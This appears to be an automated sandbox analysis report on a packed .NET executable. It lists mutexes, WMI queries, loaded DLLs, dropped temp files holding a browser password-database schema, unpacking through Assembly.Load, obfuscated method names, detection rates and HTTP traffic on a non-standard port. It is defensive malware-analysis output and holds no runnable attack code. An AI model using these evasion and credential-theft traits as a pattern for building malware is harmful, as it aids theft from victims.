Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Mutant created: \Sessions\1\BaseNamedObjects\YUNDhpkGx
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

File created: C:\Users\user\AppData\Local\Temp\tmpD144.tmp

Jump to behavior

Source: 9dOKGgFNL2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9dOKGgFNL2.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpD177.tmp.2.dr, tmpD19B.tmp.2.dr, tmpD18A.tmp.2.dr, tmpD19A.tmp.2.dr, tmpD189.tmp.2.dr, tmpD178.tmp.2.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9dOKGgFNL2.exe	ReversingLabs: Detection: 66%
Source: 9dOKGgFNL2.exe	Virustotal: Detection: 62%

Source: unknown	Process created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9dOKGgFNL2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9dOKGgFNL2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 9dOKGgFNL2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: nmYV.pdb source: 9dOKGgFNL2.exe
Source:	Binary string: nmYV.pdbSHA256 source: 9dOKGgFNL2.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.cs	.Net Code: CuR0MWy3sX System.Reflection.Assembly.Load(byte[])
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.cs	.Net Code: CuR0MWy3sX System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067DE5DF push es; ret	2_2_067DE5E0
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071FBD9F push dword ptr [esp+ecx*2-75h]; ret	2_2_071FBDA3
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071F4DE4 pushfd ; retf	2_2_071F4DF1

Source: 9dOKGgFNL2.exe

Static PE information: section name: .text entropy: 7.770995746521688

Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, RI5CbnHZJMOX38NIWe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Jja8bB6lEU', 'NpG8WY4SLZ', 'i5g8z9xtJM', 'llbGpIplh1', 's9gGkAL39b', 'zgOG8XliWj', 'gRYGG5q8Fv', 'OWoDag98XMVVT6ETqbp'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, TVYCZS8CsAAf6xRfPr.cs	High entropy of concatenated method names: 'abTMGse3k', 'FfQD8fGjE', 'ocWX9F3Qj', 'o7EEysSd2', 'I7yu3gEtP', 'Ye1BG8lwQ', 'I34Ti0u4RcG9Qa7hdb', 'c0F1wry08HThRQ3JtF', 'woQY4oQUq', 'YwOoaVpYZ'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, mT0lgMk0UGmjhglQpy2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oNRRJJjkvv', 'CjuRoHlLyi', 'lHLR5jNOxN', 'aT3RRnSxHv', 'e7xRdkc7fx', 'xhKRsaPn3I', 'gVNR2Pxsy6'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, KXppZwBPgJ7E76VbXs.cs	High entropy of concatenated method names: 'cuulhrjjTF', 'A6alEaKRRv', 'XDDHgVl8Pd', 'PkjHFw6B1X', 'nSdHcJfTXo', 'OoJHL1JuHO', 'SeDHvKtLK0', 'fapHx59X52', 'r99HTYZJSi', 'fJcHCe16Rq'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, nlmoTBWi5RrBNjduPP.cs	High entropy of concatenated method names: 'v3UoH7e74r', 'r5ColW5onc', 'QEcotKLZDq', 'E6noIJVudW', 'cjyoJEWJf6', 'yCWoKUh9fA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, T5CUBJkkW6oTYTPm6hD.cs	High entropy of concatenated method names: 'utQoWGyfoQ', 'EBXozPAXTS', 'vCk5pjR2wW', 'qsf5ktLSs9', 'f2k58Y4chO', 'HvI5G57mZ0', 'I9X50wT2Z7', 'rjT53EdlhF', 'OjE5yVTrP7', 'YmP5q5xPxi'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, qDbtOObWgkLUDUcOmK.cs	High entropy of concatenated method names: 'cunJ6k4HuC', 'RtjJUh4WPV', 'OldJgCnBv1', 'F1YJFAfh04', 'ArwJcubO61', 'ye1JLGOyeY', 's69JvqD3yP', 'OstJxSfJAf', 'L6VJTTx7vZ', 'FJMJC6wGqb'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, Tgldtnuspxe3w9nTJA.cs	High entropy of concatenated method names: 'M9wHDRHrdU', 'lPpHXPKqoQ', 'VDPHZGtRXK', 'Xb6HuwNOpL', 'kuGHPAmcBH', 'vpIHSc0G6B', 'p4sHVwZLO6', 'rxtHY6Tmrv', 'CbBHJaf2CW', 'KHRHo7QA90'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, pa30ECvIFvyAltBGSh.cs	High entropy of concatenated method names: 'tBDIyO21fN', 'iE8IHYIm0a', 'hw3ItxSF45', 'B1rtWHGog3', 'KIItzWhFfb', 'j2sIpCAW4U', 'HVsIkyN3DW', 'UqbI80l6MO', 'FU1IGsgEUS', 'IO9I0U0D91'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, to6tbw1Sv4LCFDGbFJ.cs	High entropy of concatenated method names: 'KJZ7ZJJeLY', 'l8D7u7wv5m', 'TuI76cIJeD', 'y317UNlsQn', 'LNU7FTlA4i', 'x187ceYm7b', 'del7v1ZEX9', 'pyn7xTJ7u1', 'r0k7CLxjj7', 'OUQ7ja5j8L'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, neicNOfGWVJmDBuMMa.cs	High entropy of concatenated method names: 'DikVmP2p2L', 'PeIVW2r6qk', 'JYYYpHBxAr', 'qKmYkZRh9D', 'MY3VjXuh8G', 'R89VNoYK3i', 'eXtV1fpGv4', 'KrpV4JsD35', 'lHKVA3upPb', 'AJxViniaRr'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, Rc2muXTKqVZvJsmYO7.cs	High entropy of concatenated method names: 'cfIIeo0CNR', 'JmhIOHRY7q', 'eh0IMm9UBh', 'nDkIDJR07p', 'qoxIhLi5oB', 'i2oIXM3EfE', 'XQHIEVrjOW', 'ySLIZSAb7Y', 'QxjIu9oM3E', 'lEvIB0OCXs'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, TLjf954KTOhdvwbmoK.cs	High entropy of concatenated method names: 'TN6PCUfeNQ', 'UIjPNB2QMf', 'IubP4pjyUb', 'xFBPADHqnK', 'twkPUQLnkX', 'wQVPgP0Iet', 'Hr2PFDLgXT', 'yQ6PcVARZE', 'TLRPLLHUji', 'hMMPvfiAEj'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.cs	High entropy of concatenated method names: 'K0EG3hIdYk', 'nZqGy7xs3s', 'lyyGqyJu0d', 'zCcGHbB18s', 'mOMGlFWd1D', 'c7aGtdJoPg', 'hE8GIADHYc', 'jIHGKFEn6e', 'aUsGnvT6Y0', 'oWxGQvwnQy'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, O23pNJ6EhjttsNQhGK.cs	High entropy of concatenated method names: 'VqYt3uxTLn', 'FRQtqg3KDy', 'H6rtl4LRLm', 'GRgtIocc4x', 'eXYtKXqBnb', 'LjtlwUL1qE', 'vA7lf8XP7U', 'AN8l9viaIk', 'Ee9lmjH2qK', 'vXMlb9qiZb'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, d5oNk0qNHVBJ02cV5H.cs	High entropy of concatenated method names: 'Dispose', 'dKNkbKj2BC', 'N6F8U9nZPW', 'xt8nNCcuZx', 'WaPkWj1CsY', 'lAGkzIRUAJ', 'ProcessDialogKey', 'duV8pDbtOO', 'Ygk8kLUDUc', 'ymK887lmoT'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, GnKswFzT5fBSNjTCYX.cs	High entropy of concatenated method names: 'guZoXFdbJD', 'zaGoZj1VEJ', 'TkxouXkZK9', 'UqKo660TxR', 'dj6oUNCV5S', 'lUdoFCiJwd', 'aEUockj3NL', 'BbSo2DlJTs', 'jjuoeHRPNO', 'JHFoOqssRx'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, anJOVC9Gs0KNKj2BCm.cs	High entropy of concatenated method names: 'nLBJPSNxIK', 'MX0JV8rTGU', 'zXgJJSJDia', 'hZdJ5VUsh9', 'cQnJdRxPDQ', 'AaZJ2akfLy', 'Dispose', 'qpOYy6aJAf', 'CPxYqCafiQ', 'C9lYHy4aBY'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, iZq82EZ6VPakI888Ti.cs	High entropy of concatenated method names: 'ETaq4qXUTJ', 'XKJqAsVrDR', 'T8CqiVQ8GZ', 'WFkqr0rMWw', 'kdyqwQf4v5', 'i8tqfUDUg5', 'rgWq93sdG4', 'N7MqmNm0Gq', 'itEqbXKUMv', 'FIWqW9FIZ6'
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, QjRGfp0mhEGSXg3p4e.cs	High entropy of concatenated method names: 'GmtkIZq82E', 'GVPkKakI88', 'lspkQxe3w9', 'lTJkaALXpp', 'GVbkPXsj23', 'aNJkSEhjtt', 'iOcjHrm9R8xWXHVrkP', 'fuhlW7qAUmE8DYZHrv', 'Tvbkk4Xbfl', 'tDjkGf3dpI'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, RI5CbnHZJMOX38NIWe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Jja8bB6lEU', 'NpG8WY4SLZ', 'i5g8z9xtJM', 'llbGpIplh1', 's9gGkAL39b', 'zgOG8XliWj', 'gRYGG5q8Fv', 'OWoDag98XMVVT6ETqbp'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, TVYCZS8CsAAf6xRfPr.cs	High entropy of concatenated method names: 'abTMGse3k', 'FfQD8fGjE', 'ocWX9F3Qj', 'o7EEysSd2', 'I7yu3gEtP', 'Ye1BG8lwQ', 'I34Ti0u4RcG9Qa7hdb', 'c0F1wry08HThRQ3JtF', 'woQY4oQUq', 'YwOoaVpYZ'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, mT0lgMk0UGmjhglQpy2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oNRRJJjkvv', 'CjuRoHlLyi', 'lHLR5jNOxN', 'aT3RRnSxHv', 'e7xRdkc7fx', 'xhKRsaPn3I', 'gVNR2Pxsy6'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, KXppZwBPgJ7E76VbXs.cs	High entropy of concatenated method names: 'cuulhrjjTF', 'A6alEaKRRv', 'XDDHgVl8Pd', 'PkjHFw6B1X', 'nSdHcJfTXo', 'OoJHL1JuHO', 'SeDHvKtLK0', 'fapHx59X52', 'r99HTYZJSi', 'fJcHCe16Rq'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, nlmoTBWi5RrBNjduPP.cs	High entropy of concatenated method names: 'v3UoH7e74r', 'r5ColW5onc', 'QEcotKLZDq', 'E6noIJVudW', 'cjyoJEWJf6', 'yCWoKUh9fA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, T5CUBJkkW6oTYTPm6hD.cs	High entropy of concatenated method names: 'utQoWGyfoQ', 'EBXozPAXTS', 'vCk5pjR2wW', 'qsf5ktLSs9', 'f2k58Y4chO', 'HvI5G57mZ0', 'I9X50wT2Z7', 'rjT53EdlhF', 'OjE5yVTrP7', 'YmP5q5xPxi'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, qDbtOObWgkLUDUcOmK.cs	High entropy of concatenated method names: 'cunJ6k4HuC', 'RtjJUh4WPV', 'OldJgCnBv1', 'F1YJFAfh04', 'ArwJcubO61', 'ye1JLGOyeY', 's69JvqD3yP', 'OstJxSfJAf', 'L6VJTTx7vZ', 'FJMJC6wGqb'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, Tgldtnuspxe3w9nTJA.cs	High entropy of concatenated method names: 'M9wHDRHrdU', 'lPpHXPKqoQ', 'VDPHZGtRXK', 'Xb6HuwNOpL', 'kuGHPAmcBH', 'vpIHSc0G6B', 'p4sHVwZLO6', 'rxtHY6Tmrv', 'CbBHJaf2CW', 'KHRHo7QA90'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, pa30ECvIFvyAltBGSh.cs	High entropy of concatenated method names: 'tBDIyO21fN', 'iE8IHYIm0a', 'hw3ItxSF45', 'B1rtWHGog3', 'KIItzWhFfb', 'j2sIpCAW4U', 'HVsIkyN3DW', 'UqbI80l6MO', 'FU1IGsgEUS', 'IO9I0U0D91'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, to6tbw1Sv4LCFDGbFJ.cs	High entropy of concatenated method names: 'KJZ7ZJJeLY', 'l8D7u7wv5m', 'TuI76cIJeD', 'y317UNlsQn', 'LNU7FTlA4i', 'x187ceYm7b', 'del7v1ZEX9', 'pyn7xTJ7u1', 'r0k7CLxjj7', 'OUQ7ja5j8L'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, neicNOfGWVJmDBuMMa.cs	High entropy of concatenated method names: 'DikVmP2p2L', 'PeIVW2r6qk', 'JYYYpHBxAr', 'qKmYkZRh9D', 'MY3VjXuh8G', 'R89VNoYK3i', 'eXtV1fpGv4', 'KrpV4JsD35', 'lHKVA3upPb', 'AJxViniaRr'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, Rc2muXTKqVZvJsmYO7.cs	High entropy of concatenated method names: 'cfIIeo0CNR', 'JmhIOHRY7q', 'eh0IMm9UBh', 'nDkIDJR07p', 'qoxIhLi5oB', 'i2oIXM3EfE', 'XQHIEVrjOW', 'ySLIZSAb7Y', 'QxjIu9oM3E', 'lEvIB0OCXs'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, TLjf954KTOhdvwbmoK.cs	High entropy of concatenated method names: 'TN6PCUfeNQ', 'UIjPNB2QMf', 'IubP4pjyUb', 'xFBPADHqnK', 'twkPUQLnkX', 'wQVPgP0Iet', 'Hr2PFDLgXT', 'yQ6PcVARZE', 'TLRPLLHUji', 'hMMPvfiAEj'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.cs	High entropy of concatenated method names: 'K0EG3hIdYk', 'nZqGy7xs3s', 'lyyGqyJu0d', 'zCcGHbB18s', 'mOMGlFWd1D', 'c7aGtdJoPg', 'hE8GIADHYc', 'jIHGKFEn6e', 'aUsGnvT6Y0', 'oWxGQvwnQy'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, O23pNJ6EhjttsNQhGK.cs	High entropy of concatenated method names: 'VqYt3uxTLn', 'FRQtqg3KDy', 'H6rtl4LRLm', 'GRgtIocc4x', 'eXYtKXqBnb', 'LjtlwUL1qE', 'vA7lf8XP7U', 'AN8l9viaIk', 'Ee9lmjH2qK', 'vXMlb9qiZb'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, d5oNk0qNHVBJ02cV5H.cs	High entropy of concatenated method names: 'Dispose', 'dKNkbKj2BC', 'N6F8U9nZPW', 'xt8nNCcuZx', 'WaPkWj1CsY', 'lAGkzIRUAJ', 'ProcessDialogKey', 'duV8pDbtOO', 'Ygk8kLUDUc', 'ymK887lmoT'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, GnKswFzT5fBSNjTCYX.cs	High entropy of concatenated method names: 'guZoXFdbJD', 'zaGoZj1VEJ', 'TkxouXkZK9', 'UqKo660TxR', 'dj6oUNCV5S', 'lUdoFCiJwd', 'aEUockj3NL', 'BbSo2DlJTs', 'jjuoeHRPNO', 'JHFoOqssRx'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, anJOVC9Gs0KNKj2BCm.cs	High entropy of concatenated method names: 'nLBJPSNxIK', 'MX0JV8rTGU', 'zXgJJSJDia', 'hZdJ5VUsh9', 'cQnJdRxPDQ', 'AaZJ2akfLy', 'Dispose', 'qpOYy6aJAf', 'CPxYqCafiQ', 'C9lYHy4aBY'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, iZq82EZ6VPakI888Ti.cs	High entropy of concatenated method names: 'ETaq4qXUTJ', 'XKJqAsVrDR', 'T8CqiVQ8GZ', 'WFkqr0rMWw', 'kdyqwQf4v5', 'i8tqfUDUg5', 'rgWq93sdG4', 'N7MqmNm0Gq', 'itEqbXKUMv', 'FIWqW9FIZ6'
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, QjRGfp0mhEGSXg3p4e.cs	High entropy of concatenated method names: 'GmtkIZq82E', 'GVPkKakI88', 'lspkQxe3w9', 'lTJkaALXpp', 'GVbkPXsj23', 'aNJkSEhjtt', 'iOcjHrm9R8xWXHVrkP', 'fuhlW7qAUmE8DYZHrv', 'Tvbkk4Xbfl', 'tDjkGf3dpI'

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49738

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
